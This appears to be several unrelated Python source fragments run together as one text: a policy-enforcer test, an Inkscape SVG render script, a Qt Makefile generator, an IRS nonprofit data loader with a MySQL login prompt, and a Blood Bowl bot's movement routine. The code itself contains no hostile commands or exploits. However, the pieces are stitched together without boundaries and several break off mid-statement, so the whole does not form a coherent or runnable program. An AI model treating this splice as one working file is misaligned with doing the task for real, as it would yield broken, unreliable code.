entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) # Write the policy file for an enforcer to load sample_file = self.get_config_file_fullname('policy-sample.yaml') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr): # generate sample-policy file with only rules generator._generate_sample(['base_rules', 'rules'], sample_file, include_help=False) enforcer = policy.Enforcer(self.conf, policy_file='policy-sample.yaml') # register an opt defined in the file enforcer.register_default(policy.RuleDefault('admin', 'is_admin:False')) # register a new opt enforcer.register_default(policy.RuleDefault('foo', 'role:foo')) # Mock out
#!/usr/bin/env python3 ################################################################################ #### ABOUT: #### #### Render script for the SVGs in the SOURCE_DIR directory. #### #### The renders will be placed in RENDER_DIR. #### #### If possible, SVGs containing AUTH_TAG or PRINT_TAG will have #### #### the full tags inserted. #### #### #### #### CAVEATS: #### #### While spaces in filenames are supported, newlines are not. #### #### Presently, authorisation and printing tags will be inserted wholly #### #### on one line. No flowed text. #### ################################################################################ #### You can override these defaults at run-time via command-line flags. #### # You will almost definitely want to update this yourself BACKEND_PATHS = ["/Applications/Inkscape.app/Contents/Resources/bin/inkscape", "/Applications/Inkscape.app/Contents/MacOS/inkscape", "/usr/bin/inkscape"] COLLATER_PATH = "/usr/bin/pdfunite" # If the paths below are relative, this file is assumed to be in the # project's root directory. SOURCE_DIR = "Artwork" # default: "Artwork" RENDER_DIR = "Renders" # default: "Renders" AUTH_TAG_FILE = "auth_tag.txt" # default: "auth_tag.txt" PRINT_TAG_FILE = "print_tag.txt" # default: "print_tag.txt" AUTH_TAG_FILE_BASIC = "auth_tag_basic.txt" # default: "auth_tag_basic.txt" # The text below is found, and replaced with the content of the relevant # file listed above. Neither replaced text may be an SVG tag, for obvious reasons. AUTH_TAG = "PPAU_AUTH_TAG" # default: "PPAU_AUTH_TAG" PRINT_TAG = "PPAU_PRINT_TAG" # default: "PPAU_PRINT_TAG" #### Other settings #### VERBOSE = False NO_COLLATE = False COLLATE_FMT = r'(.*)(_[pP])(\d+)(-\w*)?$' # Collation format regex spec: four groups, consisting of... # 1. the primary file name, # 2. an underscore and a P, # 3. digit[s] specifying the page order # 4. optional alphanumeric description starting with a hyphen # [the extension follows and is handled separately] # example: `relative/path/to/filename_p1.svg` #### You can't currently override these at run-time #### FORMATS = ["pdf", "png"] # (name, include auth tag, include print tag) VARIANTS = [("auth", True, False), ("both", True, True), ("none", False, False)] # NB: it's absurd to include a print tag but not an auth tag. # Manifest output file MANIFEST_FILE = "MANIFEST.json" ################################################################################ #### End users shouldn't need to ever edit anything below this comment. #### ################################################################################ VERSION = "0.5.1" BACKEND = "inkscape" COLLATER = "pdfunite" BACKEND_PATH = "" # import all the things import subprocess import os import sys import shutil import shlex import tempfile import time import argparse import filecmp import json import re import io # Parse arguments parser = argparse.ArgumentParser(description="Render the source files.", prog="PPAU-Graphics Renderscript") parser.add_argument('--source_dir', dest='source_dir', action='store', default=SOURCE_DIR, help="The directory containing the source files.") parser.add_argument('--render_dir', dest='render_dir', action='store', default=RENDER_DIR, help="Where to put the rendered files. " + "It will be created if necessary.") parser.add_argument('--auth_tag_file', dest='auth_tag_file', action='store', default=AUTH_TAG_FILE, help="The file containing the authorisation text.") parser.add_argument('--auth_tag_file_basic', dest='auth_tag_file_basic', action='store', default=AUTH_TAG_FILE_BASIC, help="The file containing the authorisation text\ specifying only a town/city (for digital material).") parser.add_argument('--print_tag_file', dest='print_tag_file', action='store', default=PRINT_TAG_FILE, help="The file containing the printer location text.") parser.add_argument('--auth_tag', dest='auth_tag', action='store', default=AUTH_TAG, help="The placeholder authorisation text.") parser.add_argument('--print_tag', dest='print_tag', action='store', default=PRINT_TAG, help="The placeholder printer text.") parser.add_argument('--backend_path', dest='backend_path', action='store', default=BACKEND_PATH, help="The path to the backend renderer, " + "by default your "+ BACKEND + " install.") parser.add_argument('--no-collate', dest='no_collate', action='store_const', default=NO_COLLATE, const=True, help="Don't collate multi-page files.") parser.add_argument('--collate-fmt', dest='collate_fmt', action='store', default=COLLATE_FMT, help="A regex string that matches your filename numbering pattern.") parser.add_argument('--verbose', dest='verbose', action='store_const', default=VERBOSE, const=True, help="Be more verbose about file processing.") parser.add_argument('--version', action='version', version='%(prog)s '+VERSION) args = parser.parse_args() # Update Flags SOURCE_DIR = args.source_dir RENDER_DIR = args.render_dir AUTH_TAG_FILE = args.auth_tag_file AUTH_TAG_FILE_BASIC = args.auth_tag_file_basic PRINT_TAG_FILE = args.print_tag_file AUTH_TAG = args.auth_tag PRINT_TAG = args.print_tag BACKEND_PATH = args.backend_path NO_COLLATE = args.no_collate COLLATE_FMT = args.collate_fmt VERBOSE = args.verbose # Fix directory issues by using absolute pathnames (if possible). # (These come about because the current working directory is not # necessarily the project root directory). if sys.path[0]: if not os.path.isabs(SOURCE_DIR): SOURCE_DIR = os.path.join(sys.path[0], SOURCE_DIR) if not os.path.isabs(RENDER_DIR): RENDER_DIR = os.path.join(sys.path[0], RENDER_DIR) if not os.path.isabs(AUTH_TAG_FILE): AUTH_TAG_FILE = os.path.join(sys.path[0], AUTH_TAG_FILE) if not os.path.isabs(AUTH_TAG_FILE_BASIC): AUTH_TAG_FILE_BASIC = os.path.join(sys.path[0], AUTH_TAG_FILE_BASIC) if not os.path.isabs(PRINT_TAG_FILE): PRINT_TAG_FILE = os.path.join(sys.path[0], PRINT_TAG_FILE) # Just a little helper function def printv(*args, **kwargs): if VERBOSE: print(*args, **kwargs, file=sys.stderr) printv("Version:", VERSION) # make BACKEND work (on posix systems, anyway) for bp in BACKEND_PATHS: if os.path.exists(bp): BACKEND_PATH = bp break else: if os.name == "posix": backendtry = subprocess.run(["which", BACKEND], stdout=subprocess.PIPE, universal_newlines=True)\ .stdout.strip() if backendtry: printv("Using "+ BACKEND +" at " + backendtry + " instead.") BACKEND_PATH = backendtry else: print("ERROR: could not find "+ BACKEND +"!", file=sys.stderr) sys.exit(1) else: print("ERROR: could not find "+ BACKEND +"!", file=sys.stderr) sys.exit(1) # Go find COLLATER if we haven't already if not os.path.exists(COLLATER_PATH) and not NO_COLLATE: printv("{} not found at specified path {}".format(COLLATER, COLLATER_PATH)) if os.name == "posix": collatertry = subprocess.run(["which", COLLATER], stdout=subprocess.PIPE, universal_newlines=True)\ .stdout.strip() if collatertry: printv("Using "+ COLLATER +" at " + collatertry + " instead.") COLLATER_PATH = collatertry else: print("ERROR: could not find "+ COLLATER +"!", file=sys.stderr) sys.exit(1) else: print("ERROR: could not find "+ COLLATER +"!", file=sys.stderr) sys.exit(1) # Recursively find all SVGs in SOURCE_DIR SVGs = subprocess.run(["find", SOURCE_DIR, "-type", "f", "-name", "*.svg"], stdout=subprocess.PIPE, universal_newlines=True)\ .stdout.strip().split(sep="\n") # Load authorisation and printing tags auth_tag_full = "" auth_tag_basic = "" print_tag_full = "" # basic can fall back on full if it exists try: with open(AUTH_TAG_FILE) as atfp: auth_tag_full = atfp.read().strip() printv("full", auth_tag_full) except FileNotFoundError: print("Authorisation tag file not found!", "No substitution will be performed.") auth_tag_full = AUTH_TAG try: with open(AUTH_TAG_FILE_BASIC) as atfp: auth_tag_basic = atfp.read().strip() except FileNotFoundError: print("Basic auth tag file not found! Falling back on", AUTH_TAG_FILE) auth_tag_basic = auth_tag_full try: with open(PRINT_TAG_FILE) as ptfp: print_tag_full = ptfp.read().strip() printv(print_tag_full) except FileNotFoundError: print("Printing tag file not found!", "No substitution will be performed.") print_tag_full = PRINT_TAG # We also want to keep a manifest of what we've done. # {file basename, [paths to renders...]} # but we don't actually want absolute pathnames for that # we want them relative to the Source and Render dirs manifest = {} multipagers = {} skipcount = 0 updatecount = 0 notagcount = 0 # Small amount of Inkscape funzies. # Make shell mode work, part 1 commands = io.StringIO() # Iterate over SVGs... for s in SVGs: if len(s) == 0: continue (sdir, sbase) = os.path.split(s) # actually use relative path key = os.path.splitext(s[(len(SOURCE_DIR)+1):])[0] printv('1:\t', key) # figure out here if we're actually in a multi-pager page_num = 1 re_match = re.search(COLLATE_FMT, key) newkey = key # updated if multipager if re_match: newkey = re_match.group(1) if newkey not in multipagers: multipagers[newkey] = [] multipagers[newkey].append((re_match.group(2),re_match.group(3))) printv("*** Found a multi-pager: {}, page {}".format(re_match.group(1), re_match.group(3))) page_num = int(re_match.group(3)) # initialise # manifest[key] = [] if not newkey in manifest: manifest[newkey] = {} submanifest = [] # pop variants in here instead # Iterate over variants... for variant in VARIANTS: auth_tag_var = "" print_tag_var = "" if variant[1]: # default to basic auth_tag_var = auth_tag_basic if variant[2]: # if we need a print tag, we need a full auth tag print_tag_var = print_tag_full auth_tag_var = auth_tag_full # override # We shall first output the auth'd SVGs to RENDER_DIR #rdir = os.path.join(RENDER_DIR, sdir.replace(SOURCE_DIR + os.path.sep, "")) # there's a bug about where outputs go and I suspect it's this line ^^ ## sometimes SOURCE_DIR already has a trailing path separator and sdir doesn't sfrag = sdir.replace(SOURCE_DIR.strip(os.path.sep), "").strip(os.path.sep) rdir = os.path.normpath(os.path.join(RENDER_DIR, sfrag)) (r_tag_root, r_tag_ext) = os.path.splitext(sbase) # Pathnames of tagged SVGs r_tag = os.path.join(rdir, r_tag_root + "-" + variant[0] + r_tag_ext) printv("sdir:", sdir, "sfrag:", sfrag, "rdir:", rdir, "r_tag", r_tag) #exit() # On checking file modification dates and skipping if 'no change': # Ideally we could not update the tagged SVG if it wouldn't change, # or at least not update its file modification date -- otherwise, # toggling output formats forces a full re-rendering. # Switching to/from alternate tags might also cause issues. # We have to handle this case by just speculatively tagging and # comparing to the existing file (if it exists) # OK. Create temp file and run sed into it for the tags # hmm. this runs once per output format right now. if not os.path.exists(rdir): # print(rdir) os.makedirs(rdir) # We should search the relevant file for the tag and skip # if we would normally substitute, but it doesn't exist if variant[1] and \ int(subprocess.run(["grep", "-cF", AUTH_TAG, s], stdout=subprocess.PIPE) .stdout) < 1: printv("No Auth Tag: skipping what would be", r_tag, sep='\t') notagcount += 1 continue if variant[2] and \ int(subprocess.run(["grep", "-cF", PRINT_TAG, s], stdout=subprocess.PIPE) .stdout) < 1: printv("No Print Tag: skipping what would be", r_tag, sep='\t') notagcount += 1 continue # Now it's sed time with tempfile.NamedTemporaryFile() as tmpfp: subprocess.run(["sed", "-e", "s/" + re.escape(AUTH_TAG) + "/" + re.escape(auth_tag_var) + "/g", "-e", "s/" + re.escape(PRINT_TAG) + "/" + re.escape(print_tag_var) + "/g", s], stdout=tmpfp) # Compare speculative and existing tagged SVGs if os.path.exists(r_tag): if filecmp.cmp(r_tag, tmpfp.name): # SVGs
and "QtAssistant" in self._qt: if "QtGui" not in self._qt: self._qt.append("QtGui") if "QtNetwork" not in self._qt: self._qt.append("QtNetwork") for mod in self._qt: lib = self._qt_module_to_lib(mod) libs.append(self.platform_lib(lib, self._is_framework(mod))) if sys.platform == "win32": # On Windows the dependent libraries seem to be in # qmake.conf rather than the .prl file and the # inter-dependencies between Qt libraries don't seem to # be anywhere. deps = _UniqueList() if mod in list(wdepmap.keys()): deps.extend(self.optional_list(wdepmap[mod])) if mod in list(qt_depmap.keys()): for qdep in qt_depmap[mod]: # Ignore the dependency if it is explicitly # linked. if qdep not in self._qt: libs.append(self.platform_lib(self._qt_module_to_lib(qdep))) if qdep in list(wdepmap.keys()): deps.extend(self.optional_list(wdepmap[qdep])) libs.extend(deps.as_list()) else: libs.extend(self._dependent_libs(lib, self._is_framework(mod))) else: # Windows needs the version number appended if Qt is a DLL. qt_lib = self.config.qt_lib if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE") and win_shared: qt_lib = qt_lib + version_to_string(qt_version).replace(".", "") if self.config.qt_edition == "non-commercial": qt_lib = qt_lib + "nc" libs.append(self.platform_lib(qt_lib, self.config.qt_framework)) libs.extend(self._dependent_libs(self.config.qt_lib)) # Handle header directories. specd = os.path.join(mkspecs, "default") if not os.access(specd, os.F_OK): specd = os.path.join(mkspecs, self.config.platform) incdir.append(specd) qtincdir = self.optional_list("INCDIR_QT") if qtincdir: if qt_version >= 0x040000: for mod in self._qt: if mod == "QAxContainer": incdir.append(os.path.join(qtincdir[0], "ActiveQt")) elif self._is_framework(mod): idir = libdir_qt[0] if mod == "QtAssistant" and qt_version < 0x040202: mod = "QtAssistantClient" incdir.append(os.path.join(idir, mod + ".framework", "Headers")) if qt_version >= 0x050000: if mod == "QtGui": incdir.append(os.path.join(idir, "QtWidgets.framework", "Headers")) incdir.append(os.path.join(idir, "QtPrintSupport.framework", "Headers")) elif mod == "QtWebKit": incdir.append(os.path.join(idir, "QtWebKitWidgets.framework", "Headers")) else: idir = qtincdir[0] incdir.append(os.path.join(idir, mod)) if qt_version >= 0x050000: if mod == "QtGui": incdir.append(os.path.join(idir, "QtWidgets")) incdir.append(os.path.join(idir, "QtPrintSupport")) elif mod == "QtWebKit": incdir.append(os.path.join(idir, "QtWebKitWidgets")) # This must go after the module include directories. incdir.extend(qtincdir) if self._opengl: incdir.extend(self.optional_list("INCDIR_OPENGL")) lflags.extend(self.optional_list("LFLAGS_OPENGL")) libdir.extend(self.optional_list("LIBDIR_OPENGL")) libs.extend(self.optional_list("LIBS_OPENGL")) if self._qt or self._opengl: if qt_version < 0x040000 or self._opengl or "QtGui" in self._qt: incdir.extend(self.optional_list("INCDIR_X11")) libdir.extend(self.optional_list("LIBDIR_X11")) libs.extend(self.optional_list("LIBS_X11")) if self._threaded: libs.extend(self.optional_list("LIBS_THREAD")) libs.extend(self.optional_list("LIBS_RTMT")) else: libs.extend(self.optional_list("LIBS_RT")) if self.console: libs.extend(self.optional_list("LIBS_CONSOLE")) libs.extend(self.optional_list("LIBS_WINDOWS")) lflags.extend(self._platform_rpaths(rpaths.as_list())) # Save the transformed values. self.CFLAGS.set(cflags) self.CXXFLAGS.set(cxxflags) self.DEFINES.set(defines) self.INCDIR.set(incdir) self.LFLAGS.set(lflags) self.LIBDIR.set(libdir) self.LIBS.set(libs) # Don't do it again because it has side effects. self._finalised = 1 def _add_manifest(self, target=None): """Add the link flags for creating a manifest file. """ if target is None: target = "$(TARGET)" self.LFLAGS.append("/MANIFEST") self.LFLAGS.append("/MANIFESTFILE:%s.manifest" % target) def _is_framework(self, mod): """Return true if the given Qt module is a framework. """ return (self.config.qt_framework and (self.config.qt_version >= 0x040200 or mod != "QtAssistant")) def _qt_module_to_lib(self, mname): """Return the name of the Qt library corresponding to a module. mname is the name of the module. """ qt_version = self.config.qt_version if mname == "QtAssistant": if qt_version >= 0x040202 and sys.platform == "darwin": lib = mname else: lib = "QtAssistantClient" else: lib = mname lib += self._infix if self._debug: if sys.platform == "win32": lib = lib + "d" elif sys.platform == "darwin": if not self._is_framework(mname): lib = lib + "_debug" elif qt_version < 0x040200: lib = lib + "_debug" qt5_rename = False if sys.platform == "win32" and "shared" in self.config.qt_winconfig.split(): if (mname in ("QtCore", "QtDeclarative", "QtDesigner", "QtGui", "QtHelp", "QtMultimedia", "QtNetwork", "QtOpenGL", "QtScript", "QtScriptTools", "QtSql", "QtSvg", "QtTest", "QtWebKit", "QtXml", "QtXmlPatterns", "phonon", "QAxContainer", "QtPrintSupport", "QtWebKitWidgets", "QtWidgets") or (qt_version >= 0x040200 and mname == "QtAssistant")): if mname == "QAxContainer": if qt_version >= 0x050000: lib = "Qt5" + lib[1:] elif qt_version >= 0x050000: qt5_rename = True else: lib = lib + "4" elif sys.platform.startswith("linux") and qt_version >= 0x050000: qt5_rename = True if qt5_rename: lib = "Qt5" + lib[2:] return lib def optional_list(self, name): """Return an optional Makefile macro as a list. name is the name of the macro. """ return self.__dict__[name].as_list() def optional_string(self, name, default=""): """Return an optional Makefile macro as a string. name is the name of the macro. default is the default value """ s = ' '.join(self.optional_list(name)) if not s: s = default return s def required_string(self, name): """Return a required Makefile macro as a string. name is the name of the macro. """ s = self.optional_string(name) if not s: raise ValueError("\"%s\" must have a non-empty value" % name) return s def _platform_rpaths(self, rpaths): """Return a list of platform specific rpath flags. rpaths is the cannonical list of rpaths. """ flags = [] prefix = self.optional_string("RPATH") if prefix == "": # This was renamed in Qt v4.7. prefix = self.optional_string("LFLAGS_RPATH") if prefix != "": for r in rpaths: flags.append(_quote(prefix + r)) return flags def platform_lib(self, clib, framework=0): """Return a library name in platform specific form. clib is the library name in cannonical form. framework is set of the library is implemented as a MacOS framework. """ if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE"): plib = clib + ".lib" elif sys.platform == "darwin" and framework: plib = "-framework " + clib else: plib = "-l" + clib return plib def _dependent_libs(self, clib, framework=0): """Return a list of additional libraries (in platform specific form) that must be linked with a library. clib is the library name in cannonical form. framework is set of the library is implemented as a MacOS framework. """ if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE"): prl_name = os.path.join(self.config.qt_lib_dir, clib + ".prl") elif sys.platform == "darwin" and framework: prl_name = os.path.join(self.config.qt_lib_dir, clib + ".framework", clib + ".prl") else: prl_name = os.path.join(self.config.qt_lib_dir, "lib" + clib + ".prl") libs = self._extract_value(prl_name, "QMAKE_PRL_LIBS").split() if self.config.qt_version >= 0x050000: xtra_libs = [] if clib in ("QtGui", "Qt5Gui"): xtra_libs.append("QtWidgets") xtra_libs.append("QtPrintSupport") elif clib in ("QtWebKit", "Qt5WebKit"): xtra_libs.append("QtWebKitWidgets") for xtra in xtra_libs: libs.extend( self.platform_lib( self._qt_module_to_lib(xtra), framework).split()) return libs def _extract_value(self, fname, vname): """Return the stripped value from a name=value line in a file. fname is the name of the file. vname is the name of the value. """ value = "" if os.access(fname, os.F_OK): try: f = open(fname, "r") except IOError: error("Unable to open \"%s\"" % fname) line = f.readline() while line: line = line.strip() if line and line[0] != "#": eq = line.find("=") if eq > 0 and line[:eq].strip() == vname: value = line[eq + 1:].strip() break line = f.readline() f.close() return value def parse_build_file(self, filename): """ Parse a build file and return the corresponding dictionary. filename is the name of the build file. If it is a dictionary instead then its contents are validated. """ if type(filename) == dict: bfname = "dictionary" bdict = filename else: if os.path.isabs(filename): # We appear to be building out of the source tree. self._src_dir = os.path.dirname(filename) bfname = filename else: bfname = os.path.join(self.dir, filename) bdict = {} try: f = open(bfname, "r") except IOError: error("Unable to open \"%s\"" % bfname) line_nr = 1 line = f.readline() while line: line = line.strip() if line and line[0] != "#": eq = line.find("=") if eq <= 0: error("\"%s\" line %d: Line must be in the form 'name = value value...'." % (bfname, line_nr)) bdict[line[:eq].strip()] = line[eq + 1:].strip() line_nr = line_nr + 1 line = f.readline() f.close() # Check the compulsory values. for i in ("target", "sources"): try: bdict[i] except KeyError: error("\"%s\" is missing from \"%s\"." % (i, bfname)) # Get the optional values. for i in ("headers", "moc_headers"): try: bdict[i] except KeyError: bdict[i] = "" # Generate the list of objects. if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE"): ext = ".obj" else: ext = ".o" olist = [] for f in bdict["sources"].split(): root, discard = os.path.splitext(f) olist.append(root + ext) for f in bdict["moc_headers"].split(): if not self._qt: error("\"%s\" defines \"moc_headers\" for a non-Qt module." % bfname) root, discard = os.path.splitext(f) olist.append("moc_" + root + ext) bdict["objects"] = ' '.join(olist) return bdict def clean_build_file_objects(self, mfile, build): """Generate the clean target. mfile is the file object. build is the dictionary created from the build file. """ mfile.write("\t-%s $(TARGET)\n" % self.rm) for f in build["objects"].split(): mfile.write("\t-%s %s\n" % (self.rm, f)) for f in build["moc_headers"].split(): root, discard = os.path.splitext(f) mfile.write("\t-%s moc_%s.cpp\n" % (self.rm, root)) def ready(self): """The Makefile is now ready to be used. """ if not self._finalised: self.finalise() def generate(self): """Generate the Makefile. """ self.ready() # Make sure the destination directory exists. try: os.makedirs(self.dir) except: pass mfname = os.path.join(self.dir, self._makefile) try: mfile = open(mfname, "w") except IOError: error("Unable to create
import os, sys import re import zipfile import requests import warnings import logging import pandas as pd import numpy as np from stat import S_IREAD, S_IRGRP, S_IROTH import getpass import pymysql # Code by <NAME> (<EMAIL>), 2016-2017 class LoadData(): """ This class is inherited by the Data class, and contains the methods related to retrieving data remotely. From the web, that includes the raw 990 IRS data, the raw epostcard (990N) IRS data, and the raw BMR IRS data. From NCCS MySQL, it has the methods for nteedocAllEins, lu_fipsmsa, and all of the prior NCCS core file releases. """ def get_urls(self): """ Base method for loading the URLs necessary for downloads into memory. Main core file URL: https://www.irs.gov/uac/soi-tax-stats-annual-extract-of-tax-exempt-organization-financial-data ARGUMENTS None RETURNS None """ main = self.main path = main.path entries = {'PF':{}, 'EZ':{}, 'Full':{}, 'BMF':{}, 'epostcard':{}} entries = self.form_urls(entries, path) entries = self.epost_urls(entries, path) entries = self.bmf_urls(entries, path) self.urls = entries def form_urls(self, entries, path): """ Processes the text file in the "settings/urls" folder for EZ, Full and PF download paths. ARGUMENTS entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs path (str) : The base path on the local system RETURNS entries (dict) : Updated with the core file URLs as an entry. """ main = self.main urlregex = re.compile(r'(\d{4})\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*') skipline = re.compile(r'^#') for form in main.forms: with open(os.path.join(path, 'settings', 'urls', form.lower()+'.txt')) as f: for line in f: regex_match = urlregex.match(line) skip_match = skipline.match(line) if regex_match and not skip_match: year = int(regex_match.group(1)) url = regex_match.group(2) entries[form][year] = url print('') return entries def epost_urls(self, entries, path): """ Processes the text file in the "settings/urls" folder for the epostcard (990N) download path. ARGUMENTS entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs path (str) : The base path on the local system RETURNS entries (dict) : Updated with the epostcard URLs as an entry. """ epostregex = re.compile(r'(epostcard)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*') skipline = re.compile(r'^#') with open(os.path.join(path, 'settings', 'urls', 'epostcard.txt')) as f: for line in f: regex_match = epostregex.match(line) skip_match = skipline.match(line) if regex_match and not skip_match: url = regex_match.group(2) entries['epostcard'] = url return entries def bmf_urls(self, entries, path): """ Processes the text file in the "settings/urls" folder for BMF download path. ARGUMENTS entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs path (str) : The base path on the local system RETURNS entries (dict) : Updated with the BMF URLs as an entry. """ bmfregex = re.compile(r'(region\d)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*') skipline = re.compile(r'^#') with open(os.path.join(path, 'settings', 'urls', 'bmf.txt')) as f: for line in f: regex_match = bmfregex.match(line) skip_match = skipline.match(line) if regex_match and not skip_match: url = regex_match.group(2) region = regex_match.group(1) entries['BMF'][region] = url return entries def download(self): """ Base method for downloading the main core files from the IRS, setting the EIN as the index, and updating the SOURCE column with the appropriate file name. ARGUMENTS None RETURNS None """ main = self.main delim = self.irs_delim current_yr = self.core_file_year #int main.logger.info('Beginning any necessary downloads from the IRS.') for form in main.forms: try: url = self.urls[form][current_yr] except KeyError: raise Exception('URL not found for core file year {}, form {}. Please check the "urls" folder.'.format(current_year, form)) df = pd.read_csv(self.download_file(url), sep=delim, dtype='str') #Most IRS files have EIN in caps, but at least one (2012 EZ) has it in lowercase if 'ein' in df.columns: df.rename(columns={'ein':'EIN'}, inplace=True) df.set_index('EIN', inplace=True) #adds the source file name as a column df['SOURCE'] = url.split('/')[-1] self.data_dict[form] = df main.logger.info('Downloading complete.\n') def sql_auth(self): """ Handles logging into the NCCS MySQL server, including prompting for credentials. ARGUMENTS None RETURNS None """ if self.get_from_sql: self.main.logger.info('Authenticating connection to MySQL server...') un = input(' MySQL user name: ') if sys.stdin.isatty(): #program is being run in an interactive interpreter, and the password echo can't be shut off pw = input(' MySQL password: ') else: #system is running from the command line, and password echo can be off pw = getpass.getpass(prompt=' MySQL password: ') try: self.sql_connection = pymysql.connect(host=self.sql_server_name, db='nccs', user=un, password=pw) except pymysql.OperationalError: self.main.logger.info(' failed to connect to server; will try to load from downloads/nccs folder.\n') self.sql_connection = None else: self.main.logger.info(' login successful, will attempt to retrieve all necessary data from the SQL database.\n') else: self.main.logger.info('Without logging into NCCS MySQL server, will look for all files in downloads/nccs folder.\n') self.sql_connection = None def close_sql(self): """ Cleanly shuts down the NCCS MySQL connection. ARGUMENTS None RETURNS None """ if self.get_from_sql: self.main.logger.info('Cosing MySQL connection.') self.sql_connection.close() def get_sql(self, fname, dbase, cols='*', index_col='EIN', match_dtypes=None, force_sql_cols=False): """ Method for downloading a file, passed as the "fname" argument, from the MySQL connection established in the sql_auth method. It will first check its own cache to see if it has already downloaded the file and is holding it in memory, then it will look in the "downloads/nccs" folder to see if that exact fname has already been downloaded. Only if both of those are false will it connect to MySQL to retrieve the file. For users off the Urban campus or without a login to the NCCS MySQL server, having all the necessary files as .csv documents in the "downloads/nccs" folder means the program can still build. See "folder instructions.txt" in that folder for more details. ARGUMENTS cols (str or list): Default '*', used when only a subset of the data should be returned. index_col (str): Default 'EIN', specifies the column to use as the index. match_dtypes (DataFrame): Default None, if a dataframe is passed it will extract the schema from it and apply it to the data specified in fname; otherwise it uses the MySQL defaults. force_sql_cols (bool): Default False, If True it will force the columns specified in the cols argument to become a part of the SQL statement; otherwise it downloads * in the SELECT statement and then subsets it later. This is used, for example, in nteedocAllEINS because the full file is 1.5 gigabytes but only 1/3rd of that is needed. RETURNS DataFrame """ file_path = os.path.join(self.main.path, self.nccs_download_folder) existing_downloads = os.listdir(file_path) existing_downloads = [f for f in existing_downloads if f.endswith('.csv')] if fname in self.sql_cache: self.main.logger.info('File already cached; trying version in memory.') if isinstance(cols, list): try: return self.sql_cache[fname][cols] except KeyError: self.main.logger.info(' Specified columns not in memory.') pass #if the dataframe is cached already but the desired cols are missing, continue with sql loading else: return self.sql_cache[fname] if fname+'.csv' in existing_downloads: self.main.logger.info('File found in NCCS downloads; using already-downloaded version.') if match_dtypes is not None: dtype = match_dtypes.dtypes.to_dict() dtype['EIN'] = 'str' else: dtype = 'str' df = pd.read_csv(os.path.join(file_path, fname+'.csv'), dtype=dtype, low_memory=False, encoding='utf-8') if index_col is not None: df.set_index(index_col, inplace=True) if match_dtypes is None: num_cols = [c for c in self.numeric_columns if c in df] for col in num_cols: df[col] = pd.to_numeric(df[col], errors='coerce').fillna(0) #recast the str columns to float64 or int64 str_cols = df.select_dtypes(include=[np.object_]).columns.values #fill string NA columns with empty strings df.loc[:, str_cols] = df.loc[:, str_cols].fillna('') elif self.sql_connection is not None: con = self.sql_connection con.select_db(dbase) if force_sql_cols: sql_cols = ', '.join(cols) else: sql_cols = '*' df = pd.read_sql('SELECT {} FROM {}'.format(sql_cols, fname), con=con, index_col=index_col) df.columns = [c.upper() for c in df.columns.values] if match_dtypes is not None: self.main.logger.info(' standardizing dtypes for {}...'.format(fname)) def _dtype_matcher(c): if c.name in match_dtypes.columns: desired_type = match_dtypes[c.name].dtype.type if desired_type is np.object_: return c.astype(str) elif desired_type in [np.float64, np.int64, np.float32, np.int32]: return pd.to_numeric(c, errors='coerce').fillna(0) else: return c.astype(str) #assume strings for anything else (e.g. dates) #raise Exception('Unknown dtype: {}, {}'.format(c.name, desired_type)) else: return c.astype(str) df = df.apply(_dtype_matcher) #this is not very efficient, but I haven't found a better way to make sure all dtypes match from SQL df.to_csv(os.path.join(file_path, fname+'.csv'), index=df.index.name is not None) else: raise Exception('No active connection to NCCS MySQL database, and file not found in downloads/nccs folder: {}'.format(fname)) self.sql_cache[fname] = df #save all dataframes loaded from sql in case they are needed later, because sql load times are slow if cols == '*': return df else: return df.loc[:, [c.upper() for c in cols if c.upper() != 'EIN']]
+ 2: path = pf.get_safest_path(game, player, game.get_ball_position()) if path is not None: p = game.get_pickup_prob(player, game.get_ball_position(), allow_team_reroll=True) p = path.prob * p if pickup_p is None or p > pickup_p: pickup_p = p pickup_player = player pickup_path = path if pickup_player is not None and pickup_p > 0.33: self.actions.append(Action(ActionType.START_MOVE, player=pickup_player)) if not pickup_player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in pickup_path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) #print(f"Pick up the ball with {pickup_player.role.name}, p={pickup_p}") # Find safest path towards endzone if game.num_tackle_zones_at(pickup_player, game.get_ball_position()) == 0: paths = pf.get_all_paths(game, pickup_player, from_position=game.get_ball_position(), num_moves_used=len(pickup_path)) best_path = None best_distance = 100 target_x = game.get_opp_endzone_x(self.my_team) for path in paths: distance_to_endzone = abs(target_x - path.steps[-1].x) if path.prob == 1 and (best_path is None or distance_to_endzone < best_distance): best_path = path best_distance = distance_to_endzone if best_path is not None: steps = [] for step in best_path.steps: if game.num_tackle_zones_at(pickup_player, step) > 0: break if len(steps) + len(pickup_path.steps) >= pickup_player.get_ma(): break steps.append(step) if len(steps) > 0: self.actions.append(Action(ActionType.START_MOVE, player=ball_carrier)) for step in steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"- Move ball carrier {pickup_player.role.name}") return # Scan for unused players that are not marked open_players = [] for player in self.my_team.players: if player.position is not None and not player.state.used and game.num_tackle_zones_in(player) == 0: open_players.append(player) print("5. Move receivers into scoring distance if not already") for player in open_players: if player.has_skill(Skill.CATCH) and player != ball_carrier: if game.get_distance_to_endzone(player) > player.num_moves_left(): continue paths = pf.get_all_paths(game, ball_carrier) best_path = None best_distance = 100 target_x = game.get_opp_endzone_x(self.my_team) for path in paths: distance_to_endzone = abs(target_x - path.steps[-1].x) if path.prob == 1 and (best_path is None or distance_to_endzone < best_distance): best_path = path best_distance = distance_to_endzone if best_path is not None: steps = [] for step in best_path.steps: if len(steps) >= player.get_ma() + (3 if not player.state.up else 0): break if game.num_tackle_zones_at(player, step) > 0: break if step.distance(best_path.steps[-1]) < player.get_ma(): break steps.append(step) if len(steps) > 0: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in steps: 